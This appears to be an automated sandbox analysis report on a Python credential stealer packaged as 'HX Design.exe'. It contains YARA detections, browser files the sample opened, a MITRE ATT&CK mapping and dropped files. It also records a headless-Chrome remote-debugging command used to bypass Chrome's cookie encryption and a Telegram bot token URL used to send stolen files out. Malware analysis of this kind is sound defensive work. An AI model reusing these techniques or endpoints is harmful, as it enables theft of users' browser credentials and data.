Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjf	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\57328c1e-640f-4b62-a5a0-06d479b676c2	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjb	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\2cb4572a-4cab-4e12-9740-762c0a50285f	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibag	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfak	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\e8d04e65-de13-4e7d-b232-291855cace25	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncm	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB	Jump to behavior

Yara detected Generic Python Stealer

Source: Yara match

File source: Process Memory Space: HX Design.exe PID: 7524, type: MEMORYSTR

Source: Yara match	File source: 00000001.00000002.2099913329.00000294B4950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: HX Design.exe PID: 7524, type: MEMORYSTR

Remote Access Functionality

Attempt to bypass Chrome Application-Bound Encryption

Source: C:\Users\user\Desktop\HX Design.exe

Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --restore-last-session --remote-debugging-port=1111 --remote-allow-origins=* "--user-data-dir=C:\Users\user\AppData\Local\google\chrome\User Data" --profile-directory=Default https://www.google.com

Yara detected Blank Grabber

Source: Yara match	File source: 00000000.00000003.1678275226.000001631A8D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1678275226.000001631A8D4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2099913329.00000294B4950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: HX Design.exe PID: 7508, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HX Design.exe PID: 7524, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\_MEI75082\rarreg.key, type: DROPPED

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: HX Design.exe PID: 7524, type: MEMORYSTR

Yara detected Generic Python Stealer

Source: Yara match

File source: Process Memory Space: HX Design.exe PID: 7524, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 File and Directory Permissions Modification	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	2 Native API	Boot or Logon Initialization Scripts	1 Access Token Manipulation	31 Disable or Modify Tools	LSASS Memory	3 File and Directory Discovery	Remote Desktop Protocol	2 Data from Local System	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	122 Command and Scripting Interpreter	Logon Script (Windows)	11 Process Injection	11 Deobfuscate/Decode Files or Information	Security Account Manager	47 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	21 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	3 PowerShell	Login Hook	Login Hook	21 Obfuscated Files or Information	NTDS	141 Security Software Discovery	Distributed Component Object Model	Input Capture	1 Remote Access Software	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Software Packing	LSA Secrets	2 Process Discovery	SSH	Keylogging	3 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Timestomp	Cached Domain Credentials	41 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	4 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Masquerading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Modify Registry	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	41 Virtualization/Sandbox Evasion	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	1 Access Token Manipulation	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	11 Process Injection	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
HX Design.exe	50%	Virustotal		Browse
HX Design.exe	39%	ReversingLabs	Win64.Trojan.Znyonm

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Local\Temp\_MEI75082\VCRUNTIME140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75082\_bz2.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75082\_ctypes.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75082\_decimal.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75082\_hashlib.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75082\_lzma.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75082\_queue.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75082\_socket.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75082\_sqlite3.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75082\_ssl.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-console-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-datetime-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-debug-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-errorhandling-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-fibers-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-file-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-file-l1-2-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-file-l2-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-handle-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-heap-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-interlocked-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-libraryloader-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-localization-l1-2-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-memory-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-namedpipe-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-processenvironment-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-processthreads-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-processthreads-l1-1-1.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-profile-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-rtlsupport-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-string-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-synch-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-synch-l1-2-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-sysinfo-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-timezone-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-util-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-conio-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-convert-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-environment-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-filesystem-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-heap-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-locale-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-math-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-process-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-runtime-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-stdio-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-string-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-time-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-utility-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75082\charset_normalizer\md.cp313-win_amd64.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75082\charset_normalizer\md__mypyc.cp313-win_amd64.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75082\libcrypto-3.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75082\libffi-8.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75082\libssl-3.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75082\python313.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75082\select.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75082\sqlite3.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75082\ucrtbase.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75082\unicodedata.pyd	0%	ReversingLabs

Name	IP	Active	Malicious	Reputation
bg.microsoft.map.fastly.net	199.232.210.172	true	false	high
ip-api.com	208.95.112.1	true	false	high
www.google.com	142.250.181.132	true	false	high
api.telegram.org	149.154.167.220	true	false	high
blank-zlvej.in	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.telegram.org/bot7941165298:AAE-cxddvAA5WE9BKSZYSVJTX3zwZRZqwIw/sendDocument	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://github.com/Blank-c/BlankOBF	HX Design.exe, 00000001.00000003.1698834268.00000294B4E5A000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.1699569937.00000294B4730000.00000004.00000020.00020000.00000000.sdmp	false	high
http://anglebug.com/4836M	chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp	false	unknown
http://anglebug.com/6439s	chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp	false	unknown
http://anglebug.com/4633	chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1924238094.00002F040000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1924973398.000076D80000C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	false	high
https://anglebug.com/7382	chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1924238094.00002F040000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1924973398.000076D80000C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	false	high
https://issuetracker.google.com/284462263	msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.chambersign.org1	msedge.exe, 0000003B.00000002.1925230365.000076D800058000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.google.comLh#	msedge.exe, 0000003B.00000002.1920928232.00004C6800238000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#	HX Design.exe, 00000001.00000002.2098077553.00000294B298A000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2098822310.00000294B4410000.00000004.00000020.00020000.00000000.sdmp	false	high
https://packaging.python.org/en/latest/specifications/recording-installed-packages/#the-record-file	HX Design.exe, 00000001.00000003.2097242552.00000294B482C000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.1705144550.00000294B482E000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2088968659.00000294B482C000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2099503241.00000294B482C000.00000004.00000020.00020000.00000000.sdmp	false	high
https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64	HX Design.exe, 00000001.00000002.2098822310.00000294B4410000.00000004.00000020.00020000.00000000.sdmp	false	high
https://g.live.com/odclientsettings/Prod.C:	svchost.exe, 0000003C.00000003.1871820820.00000298F7AFF000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000003C.00000003.1871820820.00000298F7A0E000.00000004.00000800.00020000.00000000.sdmp	false	high
https://anglebug.com/7714	chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.anonfiles.com/upload	HX Design.exe, 00000001.00000002.2099913329.00000294B4950000.00000004.00001000.00020000.00000000.sdmp	false	unknown
https://www.google.com/0(p	chrome.exe, 0000003A.00000002.1925562449.00002F0400164000.00000004.00000800.00020000.00000000.sdmp	false	high
http://unisolated.invalid/	chrome.exe, 0000003A.00000002.1927910627.00002F040022C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1928665494.000076D800234000.00000004.00000800.00020000.00000000.sdmp	false	high
http://anglebug.com/8215g	chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://www.google.com/ngType	chrome.exe, 0000003A.00000002.1924238094.00002F040000C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1928927415.000076D800270000.00000004.00000800.00020000.00000000.sdmp	false	high
https://nuget.org/nuget.exe	powershell.exe, 00000008.00000002.1815598451.00000197A9B26000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.1879970672.000001D183E0A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.1935866924.000001D192658000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.1935866924.000001D192516000.00000004.00000800.00020000.00000000.sdmp	false	high
https://discord.com/api/v9/users/	HX Design.exe, 00000001.00000002.2099913329.00000294B4950000.00000004.00001000.00020000.00000000.sdmp	false	high
http://anglebug.com/6248	chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1924238094.00002F040000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	false	high
https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963	HX Design.exe, 00000001.00000002.2101137771.00000294B4E50000.00000004.00001000.00020000.00000000.sdmp	false	high
http://anglebug.com/6929	chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1924238094.00002F040000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	false	high
http://crl.dhimyotis.com/certignarootca.crl	HX Design.exe, 00000001.00000002.2102278462.00000294B542F000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2096854366.00000294B542F000.00000004.00000020.00020000.00000000.sdmp	false	high
http://curl.haxx.se/rfc/cookie_spec.html	HX Design.exe, 00000001.00000002.2101621757.00000294B5270000.00000004.00001000.00020000.00000000.sdmp	false	high
http://repository.swisssign.com/R	HX Design.exe, 00000001.00000003.2092472989.00000294B53EA000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2102278462.00000294B53EA000.00000004.00000020.00020000.00000000.sdmp	false	unknown
